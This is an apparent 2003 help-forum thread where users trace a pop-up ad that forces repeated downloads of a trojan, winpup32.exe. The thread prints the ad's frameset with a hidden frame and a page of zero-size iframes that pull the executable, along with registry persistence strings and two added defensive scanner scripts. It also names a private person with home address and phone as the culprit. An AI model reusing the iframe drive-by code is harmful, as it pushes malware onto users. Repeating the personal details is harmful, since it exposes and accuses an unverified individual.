mcic1984

smokeandapancake.org winpup32.exe

Has anyone else come across a forceful download called "winpup32.exe" from smokeandapancake.org?

For me, it seems to appear from a pop-up ad (I'm not sure which), and then it spawns hundreds of "download" windows in Internet Explorer, for http://www.smokeandapancake.org/winpup32.exe

It happened twice to me so far while browsing Xanga.  I've tried looking into the source code of the Xanga pages and the pop-up window which I think spawned the download, but I can't find it.  This download is extremely forceful - launching over a hundred windows that must be closed one by one.

When it runs, it copies itself to C:\WINDOWS\SYSTEM32\winpup32.exe and adds itself to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run in the registry so it runs automatically on startup.

It doesn't appear to do anything at all, so I can only conclude it's some kind of trojan/adware/spyware which allows access into the system.  However, Norton Antivirus 2003 doesn't detect it as a virus or anything.
esmogen

Try these two little programs, they cleaned up my wife's system real good. Might work.
Download spybot here
http://spybot.safer-networking.de/index.php?lang=en&page=download

and AdAware here:
http://www.lavasoftusa.com/
mcic1984 (ASKER)

esmogen:  Thank you for your quick reply.  AdAware definitely does a good job; but is not needed in this situation as I've removed it from the registry already.

The thing is that the ad or whatever it is spawns hundreds of winpup32.exe file download windows -- until it consumes a lot of system resources -- I've had 130 Internet Explorer download windows opening automatically this way.  It does not seem to be any of the HTML source code -- and the only way to avoid it (so far) is to use another browser other than Internet Explorer (e.g. Mozilla Firebird).

I should clarify my question -- has anyone come across this issue of winpup32.exe and know how it was done?  And, has anyone figured out how to avoid it (other than switching browsers?)  For example, with regard to IE security settings or IE patches...

If I find the culprit ads in question I'll try posting a link to it or something...
Whois info for, SMOKEANDAPANCAKE.ORG:
Registrant:
 Auric Van der Smoot
 Heilige Geeststraat, 1
 Suite L
 Brugge, BE 8000
 BE
Domain name: SMOKEANDAPANCAKE.ORG
Administrative Contact:
     Van der Smoot, Auric  domains@invinc.com
    Heilige Geeststraat, 1
    Suite L
    Brugge, BE 8000
    BE
    +1.5555555555    Fax: +1.5555555555

 Technical Contact:
     Van der Smoot, Auric  domains@invinc.com
    Heilige Geeststraat, 1
    Suite L
    Brugge, BE 8000
    BE
    +1.5555555555    Fax: +1.5555555555
Registration Service Provider:
    NatNames.com -- $15 Domain Names!, support@natnames.com
    770.471.9075
    http://natnames.com
    This company may be contacted for domain login/passwords,
    DNS/Nameserver changes, and general domain support questions.

 Registrar of Record: TUCOWS, INC.
 Record last updated on 27-May-2003.
 Record expires on 11-Apr-2004.
 Record Created on 11-Apr-2003.

 Domain servers in listed order:
    NS1.DATAPIPE.NET  
    NS2.DATAPIPE.NET

-------------------------------------------------------------------

Where the website is hosted...

Whois Server: whois.opensrs.net

Registrant:
 DataPipe
 80 River Street, 5th Floor
 Hoboken, NJ 07030
 US

 Domain name: DATAPIPE.NET

 Administrative Contact:
    Master, Host  hostmaster@datapipe.net
    80 River Street, 5th Floor
    Hoboken, NJ 07030
    US
    2017921918    Fax: 2017923090

 Technical Contact:
    Master, Host  hostmaster@datapipe.net
    80 River Street, 5th Floor
    Hoboken, NJ 07030
    US
    2017921918    Fax: 2017923090

Registration Service Provider:
    DataPipe, domains@datapipe.com
    2017921918
    http://www.datapipe.com
    This company may be contacted for domain login/passwords,
    DNS/Nameserver changes, and general domain support questions.


 Registrar of Record: TUCOWS, INC.
 Record last updated on 05-May-2003.
 Record expires on 26-Mar-2005.
 Record Created on 27-Mar-1998.

 Domain servers in listed order:
    NS1.DATAPIPE.NET   64.27.65.13
    NS2.DATAPIPE.NET   64.27.64.76
    NS3.DATAPIPE.NET   66.70.119.39
    NS4.DATAPIPE.NET   66.70.119.40
-------------------------------------------------------------------------------------

So the domain is registered with obvious fake info (phone # etc).

You can report to the host in New Jersey. They may be two separate entities. If
it's the same guy then you won't get a response from any email contact.

First off it's an *.exe and there is no way that *.exe gets on your computer unless
you had given it some help like installing pirate software, cracks, or clicked on
an email attachment that you had no idea where/who/what it was. Once clicked
on it wrote to start itself on bootup.

The only other way to be victim of this exploit is to run an outdated WindowsXX with
an unpatched browser that allows this cheap, old, ActiveX exploit to run.

FROM CODE IN winpup32.exe:
H K E Y _ L O C A L _ M A C H I N E \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \
S y s t e m R o o t   \ S y s t e m \    w i n p u p 3 2 [ 1 ] . e x e       \ w i n p u p 3 2 [ 2 ] . e x e
H K E Y _ L O C A L _ M A C H I N E \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \
R u n \ w i n 3 2 a p p  w i n p u p 3 2 . e x e

And it's popping up to:
w w w . m a r t y l i k e s ********.com ( didn't post the whole url cause it's porn).

The guilty party's name is;
Jason Buckley
      252 Bartemus Trail
      Nashua, NH 03063
      US
      Phone: 603-889-4220
      Email: jason@whitelid.com

So, the way this all works is when one surfs porn and things popup...don't say "YES".


>>I've had 130 Internet Explorer download windows opening automatically this way<<

Also in the code is a BHO exploit. Your browser has been exploited.
 I n t e r n e t E x p l o r e r . A p p l i c a t i o n     V i s i b l e   S t a t u s B a r   A d d r e s s B a r
M e n u B a r   T o o l B a r   H e i g h t     W i d t h   \   w w w . m a r t y l i k e s********.com
/ i m a g e s / b a n n e r s / h p a 1 /     N a v i g a t e   W S c r i p t . S h e l l   S y s t e m  E n v i r o n m e n t

>>AdAware definitely does a good job; but is not needed in this situation<<
You have to remove the BHO by hand or with a special program. Have you done this?
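
Added example, not part of the original thread: the spaced-out lines quoted from winpup32.exe above are consistent with UTF-16LE ("wide") strings, which an ASCII-only strings pass skips. This sketch extracts both encodings and flags the kinds of strings the post calls out; the watch list and the sample bytes are constructed for illustration and are not taken from the real file.

```python
import re

# Assumed watch list, modelled on the strings quoted in the post above.
WATCH = (
    r"CurrentVersion\Run",            # autostart persistence key
    "InternetExplorer.Application",   # COM automation of the browser
    "WScript.Shell",                  # script host object
    ".exe",                           # references to other executables
)

MIN_LEN = 6  # ignore runs shorter than this many characters


def extract_strings(data: bytes, min_len: int = MIN_LEN):
    """Yield (offset, encoding, text) for printable ASCII and UTF-16LE runs."""
    wide_run = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len   # 'H\x00K\x00E\x00...'
    ascii_run = rb"[\x20-\x7e]{%d,}" % min_len
    for m in re.finditer(wide_run, data):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")
    for m in re.finditer(ascii_run, data):
        yield m.start(), "ascii", m.group().decode("ascii")


def triage(data: bytes):
    """Return the extracted strings that match the watch list, by file offset."""
    hits = []
    for offset, encoding, text in extract_strings(data):
        matched = [w for w in WATCH if w.lower() in text.lower()]
        if matched:
            hits.append({"offset": offset, "encoding": encoding,
                         "text": text, "matched": matched})
    return sorted(hits, key=lambda h: h["offset"])


def build_sample() -> bytes:
    """Constructed byte string that imitates the layout of such a binary."""
    def wide(s):
        return s.encode("utf-16le")
    return b"".join([
        b"MZ\x90\x00\x03\x00\x00\x00",
        wide(r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"),
        b"\x00\x00\xff\xfe\x01",
        wide("win32app"),
        b"\x00\x00",
        wide("winpup32.exe"),
        b"\x00\x00\x07\x07",
        wide("InternetExplorer.Application"),
        b"\x00\x00",
        wide("WScript.Shell"),
        b"\x00\x00\x10",
        b"This program cannot be run in DOS mode.",
        b"\x00",
    ])


if __name__ == "__main__":
    for hit in triage(build_sample()):
        print(f"{hit['offset']:#06x} {hit['encoding']:9} {hit['text']}  <- {hit['matched']}")
```

Run it against a quarantined copy by replacing `build_sample()` with the file's bytes; the file is only read, never executed.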
spiderfix:  Thank you for your detailed reply!

(AdAware - version 6 - with the latest update - did not detect anything on my system; nor did NAV 2003, also with the latest definitions, notice anything wrong)

I am pretty certain the 130 download windows for smokeandapancake.org's winpup32 came from an advertisement; as it appeared while browsing a Xanga page both times it happened to me.  It was NOT an Active X security alert window; it was a normal IE6 download window with "Open", "Save", "Cancel" and "More Info" options -- except that it came up 130 times (well, the taskbar grouped all 130 IE windows together so I suppose it was 129 times + the window I had open).  It has not happened at any other time, nor have I installed any new software recently nor have I surfed any *questionable* sites!

So, is winpup32.exe a program that pops up a "marty likes *****" site?  (I've not seen it so far because I removed all references to winpup32.exe from the registry and deleted the program.)

I've reported smokeandapancake.org to abuse@datapipe.com (is that right?); I got an automated reply from them.

How can I remove the BHO exploit?  Thank you!  I'll accept your answer once I get a reply on how to remove the BHO exploit!
I just found the culprit site (back by surfing Xanga again... until the FreeMP3Blaster popup came up...)   It was indeed from a popup.


The popup ad in question is:    http://media.popuptraffic.com/scripts/popup.php?hid=15a06373d81c1924f3f3&tmpl=8mp3pop(dot)tmpl

This file has the source code:

-----------------------------


<html><head><title>FreeMP3Blaster</title></head>
<frameset rows="100%,0" FRAMEBORDER="0" FRAMESPACING="0" BORDER="0">
<frame src="http://undergroundlair(dot)net/pops/mp3popnt(dot)html" name="content" marginheight="0" marginwidth="0" scrolling="no" noresize>
<frame src="http://www.undergroundlair(dot)net/install(dot)php" name="count" marginheight="0" marginwidth="0" scrolling="no" noresize>
</frameset></html>


-----------------------------

So, I looked for the two files and opened them with Notepad:

http://undergroundlair.net/pops/mp3popnt(dot)html is a NORMAL POPUP WINDOW:

-----------------------------

<!DOCTYPE HTML PUBLIC "-//W3C//Dtd HTML 4.0 transitional//EN">
<!-- saved from url=(0043)http://www.freemp3blaster(dot)com/?10085|50060| -->
<HTML>
<HEAD>
<TITLE>FreeMP3Blaster.com</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">

<STYLE>td {
      FONT-SIZE: 10px; FONT-FAMILY: Verdana
}
.menu {
      TEXT-DECORATION: none
}
</STYLE>

<META content="MSHTML 6.00.2722.900" name=GENERATOR></HEAD>
<BODY topmargin="0" text=#000000 vLink=#000099 aLink=#000099 link=#000099 bgColor=#000000>
<img src="http://www.freemp3blaster.com/install.phtml?10085|50060|mp3pop" width=1 height=1 border=0>
<TABLE cellSpacing=0 cellPadding=0 width=750 align=center border=0>
<tr><td colSpan=2 height=5>
<TABLE cellSpacing=5 cellPadding=0 width=750 align=center border=0>
<tr vAlign=top><td width=178 bgColor=#ffffff><IMG height=25 src="mp3pop/ttl_genres2.gif" width=180><BR>&nbsp;<BR>
<TABLE cellSpacing=0 cellPadding=5 width="100%" border=0>
<tr><td width="15%"><A href="http://www.freemp3blaster(dot)com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Rock/Pop Classic Rock, 80s, Metal...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster(dot)com/install(dot)phtml?10085|50060|">Rock/Pop Classic Rock, '80s, Metal...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Alternative/Punk Indie, Punk, Hardcore...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|">Alternative/Punk Indie, Punk, Hardcore...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster(dot)com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14  border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Electronic/Dance Techno, Ambient, Drum n Bass...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster(dot)com/install(dot)phtml?10085|50060|">Electronic/Dance Techno, Ambient, Drum 'n' Bass...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Urban/Hip Hop Hip Hop, Soul, Funk...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|">Urban/Hip Hop Hip Hop, Soul, Funk...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Blues Chicago, Delta, Contemporary...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|">Blues Chicago, Delta, Contemporary...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Jazz Bebop, Swing, Latin...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|">Jazz Bebop, Swing, Latin...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Country/Folk Bluegrass, traditional Country ...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|">Country/Folk Bluegrass, traditional Country ...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='World/Reggae Dance Hall, Fusion, Dub...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|">World/Reggae Dance Hall, Fusion, Dub...</A></td></tr>
<tr><td width="15%"><A href="http://www.freemp3blaster,com/install.phtml?10085|50060|mp3pop"><IMG height=14 src="mp3pop/arrow.gif" width=14 border=0></A></td>
<td width="85%"><A class=menu onmouseover="window.status='Soundtracks/Other Film, Comedy, Spoken Word...'; return true" onmouseout="window.status=' '; return true" href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|">Soundtracks/Other Film, Comedy, Spoken Word...</A></td></tr></TABLE>
</td>
<td width=353 bgColor=#999999><P><IMG height=25 src="mp3pop/ttl_listen.gif" width=350><BR><A href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|mp3pop"><IMG height=92 src="mp3pop/mp3player.gif" width=344 border=0></A> </P>
<TABLE cellSpacing=0 cellPadding=0 width=340 align=center border=0>
<tr><td width=25><IMG height=120 src="mp3pop/ttl_thebuzz.gif" width=25></td>
<td width=150><A href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|mp3pop"><IMG height=120 src="mp3pop/shania.jpeg" width=140 border=0></A></td>
<td width=175><P>Hear the latest from Shania Twain as well as new music from Alison Krauss, Dolly Parton and more!</P><P><A href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|mp3pop"><IMG height=15 src="mp3pop/play.gif" width=15 align=absMiddle border=0></A> <A href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|mp3pop">DOWNLOAD</A></P></td></tr>
<tr><td width=25>&nbsp;</td><td width=150>&nbsp;</td><td width=175>&nbsp;</td></tr>
<tr><td width=25><IMG height=120 src="mp3pop/ttl_thebuzz.gif" width=25></td>
<td width=150><A href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|mp3pop"><IMG height=120 src="mp3pop/snoop.jpeg" width=140 border=0></A></td>
<td width=175><P>New From Snoop Dogg Play his smokin' track "From Tha Chuuuch To Da Palace" off his forthcoming sixth album. </P><P><A href="http://www.freemp3blaster.com/install(dot)phtml?10085|50060|mp3pop"><IMG height=15 src="mp3pop/play.gif" width=15 align=absMiddle border=0></A> <A href="http://www.freemp3blaster.com/install.phtml?10085|50060|mp3pop">DOWNLOAD</A></P></td></tr></TABLE></td>
<td width=240><A href="http://www.freemp3blaster,com/install(dot)phtml?10085|50060|mp3pop"><IMG height=400 src="mp3pop/software.gif" width=240 border=0></A></td></tr></TABLE></td></tr>
</TABLE>
<br><div align="center"><A href="http://www.freemp3blaster,com/privacy(dot)html"
target=_blank><FONT face="Verdana, Arial, Helvetica, sans-serif" color=#cccccc
size=1>Terms &amp; Conditions</FONT></A></div>
<script language='JavaScript' type='text/javascript' src='nt.js'></script>
</BODY>
</HTML>

-----------------------------


HOWEVER:  http://www.undergroundlair.net/install.php   is the culprit URL.  This is the code:

-----------------------------


<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">
<iframe src="http://www.smokeandapancake.org/winpup32.exe" width="0" height="0">

-----------------------------

And thus, the result is 100's of popup windows.  No wonder!!!!

And thus, it was neither because of some funny download; it was not a porn site.  Is it still a BHO exploit?  Or is this something else?  -- an even crazier form of internet advertising??
Ummm... can someone make the links NOT CLICKABLE????   Coz it is a big risk if someone clicks the links above... Sorry...
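
Added example, not part of the original thread: a scanner for saved page source that flags the two patterns found above, a frame hidden by a zero-size frameset row and zero-size iframes that point at an executable many times over. The host names, the sample markup, the extension list and the flood threshold are constructed assumptions; tags are matched leniently with a regular expression because the frames on the culprit page are never closed.

```python
import re
from collections import Counter
from urllib.parse import urlparse

EXECUTABLE_EXTS = (".exe", ".scr", ".pif", ".bat", ".cmd", ".msi")
FLOOD_THRESHOLD = 3  # assumed: same download framed this many times or more

TAG_RE = re.compile(r"<\s*(frameset|frame|iframe)\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
ZERO_RE = re.compile(r"\s*0+(?:\.0+)?\s*(?:px|%|\*)?\s*")


def _attrs(raw):
    """Parse quoted and unquoted attributes of one start tag into a dict."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(raw)}


def _is_zero(value):
    """True for sizes such as "0", "0px" or "0%"."""
    return value is not None and ZERO_RE.fullmatch(value) is not None


def scan(html):
    """List every frame/iframe with its source, visibility and target type."""
    frames, slots = [], []  # slots: row/column sizes of the current frameset
    for m in TAG_RE.finditer(html):
        tag, a = m.group(1).lower(), _attrs(m.group(2))
        if tag == "frameset":
            sizes = a.get("rows") or a.get("cols") or ""
            slots = [s.strip() for s in sizes.split(",") if s.strip()]
            continue
        hidden = _is_zero(a.get("width")) or _is_zero(a.get("height"))
        if tag == "frame" and slots:
            # A <frame> takes the next slot of its frameset, e.g. rows="100%,0".
            hidden = _is_zero(slots.pop(0)) or hidden
        src = a.get("src", "").strip()
        path = urlparse(src).path.lower()
        frames.append({"tag": tag, "src": src, "hidden": hidden,
                       "executable": path.endswith(EXECUTABLE_EXTS)})
    return frames


def findings(html):
    """Return (rule, url, count) tuples for suspicious frames in the markup."""
    frames, out = scan(html), []
    exe_counts = Counter(f["src"] for f in frames if f["executable"])
    for src, total in exe_counts.items():
        hidden = sum(1 for f in frames if f["src"] == src and f["hidden"])
        if hidden:
            out.append(("hidden-frame-executable", src, hidden))
        if total >= FLOOD_THRESHOLD:
            out.append(("download-flood", src, total))
    for f in frames:
        if f["hidden"] and not f["executable"]:
            out.append(("hidden-frame", f["src"], 1))
    return out


# Constructed samples that mirror the structure of the pages quoted above.
EXE_URL = "http://files.example.test/dropper.exe"
POPUP_SAMPLE = """<html><frameset rows="100%,0" FRAMEBORDER="0">
<frame src="http://ads.example.test/pops/ad.html" name="content" scrolling="no" noresize>
<frame src="http://ads.example.test/install.php" name="count" scrolling="no" noresize>
</frameset></html>"""
INSTALL_SAMPLE = "\n".join(
    ['<iframe src="%s" width="0" height="0">' % EXE_URL] * 130)
BENIGN_SAMPLE = ('<iframe src="https://video.example.test/embed/42" '
                 'width="560" height="315"></iframe>')

if __name__ == "__main__":
    for name, page in (("popup", POPUP_SAMPLE), ("install", INSTALL_SAMPLE),
                       ("benign", BENIGN_SAMPLE)):
        print(name, findings(page))
```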
ASKER CERTIFIED SOLUTION
spiderfix

This solution is only available to members.
spiderfix:  Thank you for your reply.  I have accepted your answer.  I suppose the dialer won't work for people connected by broadband?

I submitted the following complaint to the company hosting the ad -- admin@popuptraffic.com -- but the address seems to be down - it routes to bigron@rcn.com and the result is "Returned Mail - Over Quota ----- The following addresses had permanent delivery errors ----- bigron@rcn.com".

********

Recently I have come across an advertisement served on your server which is extremely forceful and annoying -- it launches hundreds of download windows forcing a download of some kind of trojan or spyware called winpup32.exe on users running Windows/Internet Explorer.

